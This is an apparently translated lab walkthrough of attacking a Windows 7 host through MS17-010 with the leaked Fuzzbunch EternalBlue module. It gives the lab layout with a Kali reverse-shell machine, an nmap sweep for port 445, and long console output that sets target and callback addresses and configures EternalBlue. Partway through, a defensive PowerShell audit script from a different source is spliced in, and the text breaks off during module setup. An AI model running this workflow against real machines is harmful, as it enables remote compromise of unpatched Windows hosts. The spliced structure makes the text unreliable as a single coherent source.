The WannaCry ransomware has been making a lot of noise lately. As far as is known, it spreads using MS17-010 (EternalBlue), the 0day leaked from the Equation Group toolset.
The vulnerability is said to affect WinXP through Win2012, so let's test what it actually does.
1. Environment:
Target: Win7, IP: 192.168.4.247
Attack machine: Win2003, IP: 192.168.4.16
Reverse shell: Kali, IP: 192.168.4.15
The attack machine needs a Python 2.6 environment with pywin32 installed
python-2.6.6.msi
https://www.python.org/download/releases/2.6.6/
pywin32-221.win-amd64-py2.6.exe
https://sourceforge.net/projects/pywin32/files/pywin32/Build%20221/
2. Configuring the attack machine
First you can use nmap to scan the internal network for hosts with port 445 open and collect OS information
nmap -p 445 -O 192.168.4.0/24
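The nmap scan above tells you which hosts expose port 445, but not whether a given host is actually affected by MS17-010. The following PowerShell script is an added defensive example and is not part of the original post: run in an elevated prompt on a Windows host (such as the Win7 target in this lab), it reports whether SMBv1 is still enabled, whether an MS17-010 hotfix is installed, and whether TCP 445 is listening, so the host can be patched and SMBv1 disabled before it is exposed. The function names are mine, and the KB identifiers in $PatchIds are placeholders to be replaced with the MS17-010 update ids listed in the Microsoft bulletin for the host's OS build.

```powershell
# Added example (not from the original post): audit a Windows host for the conditions
# that make it reachable by the MS17-010 SMBv1 exploit discussed above.
# Assumptions: elevated PowerShell on the host being checked; $PatchIds is a
# placeholder list to be filled from the MS17-010 bulletin for this OS build.

$PatchIds = @('KB-PLACEHOLDER-1', 'KB-PLACEHOLDER-2')  # replace with the MS17-010 KB ids for this OS

function Test-Smb1Enabled {
    # SMBv1 is controlled by the DWORD 'SMB1' under the LanmanServer Parameters key
    # (Microsoft KB2696547). A missing value means the default, which is enabled.
    $key  = 'HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters'
    $prop = Get-ItemProperty -Path $key -Name SMB1 -ErrorAction SilentlyContinue
    if ($null -eq $prop) { return $true }
    return ($prop.SMB1 -ne 0)
}

function Test-Ms17010Patched {
    param([string[]]$Ids)
    # Any one of the listed hotfix ids being present counts as patched.
    $installed = Get-HotFix | ForEach-Object { $_.HotFixID }
    foreach ($id in $Ids) {
        if ($installed -contains $id) { return $true }
    }
    return $false
}

function Test-Port445Listening {
    # netstat -an works on Win7, where Get-NetTCPConnection is not available.
    $lines = @(netstat -an | Select-String -Pattern ':445\s+.*LISTENING')
    return ($lines.Count -gt 0)
}

$smb1    = Test-Smb1Enabled
$patched = Test-Ms17010Patched -Ids $PatchIds
$exposed = Test-Port445Listening

"SMB1 enabled        : $smb1"
"MS17-010 patch found: $patched"
"TCP 445 listening   : $exposed"

if ($smb1 -and -not $patched -and $exposed) {
    Write-Warning 'Host is exposed to MS17-010: install the update, then disable SMBv1.'
    # To disable SMBv1 on Win7/2008R2 (KB2696547), set the value to 0 and reboot:
    # Set-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters' -Name SMB1 -Type DWORD -Value 0 -Force
}
```

The patch check and the SMBv1 check are deliberately separate: installing the update fixes the bug, while disabling SMBv1 removes the attack surface entirely, and a host that does only one of the two should still show up in the report.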
---------------------------------------------------------------
After downloading the tool, extract it, then create a listeningposts directory inside the tool's windows directory
Open a cmd prompt in the tool's windows directory and run fb.py
--[ Version 3.5.1
[*] Loading Plugins
[*] Initializing Fuzzbunch v3.5.1
[*] Adding Global Variables
[+] Set ResourcesDir => D:\DSZOPSDISK\Resources
[+] Set Color => True
[+] Set ShowHiddenParameters => False
[+] Set NetworkTimeout => 60
[+] Set LogDir => D:\logs
[*] Autorun ON
ImplantConfig Autorun List
==========================
0) prompt confirm
1) execute
Exploit Autorun List
====================
0) apply
1) touch all
2) prompt confirm
3) execute
Special Autorun List
====================
0) apply
1) touch all
2) prompt confirm
3) execute
Payload Autorun List
====================
0) apply
1) prompt confirm
2) execute
[+] Set FbStorage => E:\shadowbroker-master\shadowbroker-master\windows\storage
[*] Retargetting Session
[?] Default Target IP Address [] : 192.168.4.247
[?] Default Callback IP Address [] : 192.168.4.16
[?] Use Redirection [yes] : no
[?] Base Log directory [D:\logs] : no
[*] Checking E:\shadowbroker-master\shadowbroker-master\windows\no for projects
Index Project
----- -------
0 test
1 test2
2 test3
3 test4
4 test5
5 Create a New Project
[?] Project [0] : 5
[?] New Project Name : test6
[?] Set target log directory to 'E:\shadowbroker-master\shadowbroker-master\windows\no\test6\z192.168.4.247'? [Yes] :
[*] Initializing Global State
[+] Set TargetIp => 192.168.4.247
[+] Set CallbackIp => 192.168.4.16
[!] Redirection OFF
[+] Set LogDir => E:\shadowbroker-master\shadowbroker-master\windows\no\test6\z192.168.4.247
[+] Set Project => test6
fb >
--------------------------------------------
Here we use the Eternalblue module (MS17-010, EternalBlue)
fb > use Eternalblue
[!] Entering Plugin Context :: Eternalblue
[*] Applying Global Variables
[+] Set NetworkTimeout => 60
[+] Set TargetIp => 192.168.4.247
[*] Applying Session Parameters
[*] Running Exploit Touches
[!] Enter Prompt Mode :: Eternalblue
Module: Eternalblue
===================
Name Value
---- -----
NetworkTimeout 60
TargetIp 192.168.4.247
TargetPort 445
VerifyTarget True
VerifyBackdoor True
MaxExploitAttempts 3
GroomAllocations 12
Target WIN72K8R2
[!] plugin variables are valid
[?] Prompt For Variable Settings? [Yes] :
[*] NetworkTimeout :: Timeout for blocking network calls (in seconds). Use -1 for no timeout.
[?] NetworkTimeout [60] :
[*] TargetIp :: Target IP Address
[?] TargetIp [192.168.4.247] :
[*] TargetPort :: Port used by the SMB service for exploit connection
[?] TargetPort [445] :
[*] VerifyTarget :: Validate the SMB string from target against the target selected before exploitation.
[?] VerifyTarget [True] :
[*] VerifyBackdoor :: Validate the presence of the DOUBLE PULSAR backdoor before throwing. This option must be enabled for multiple exploit attempts.
[?] VerifyBackdoor [True] :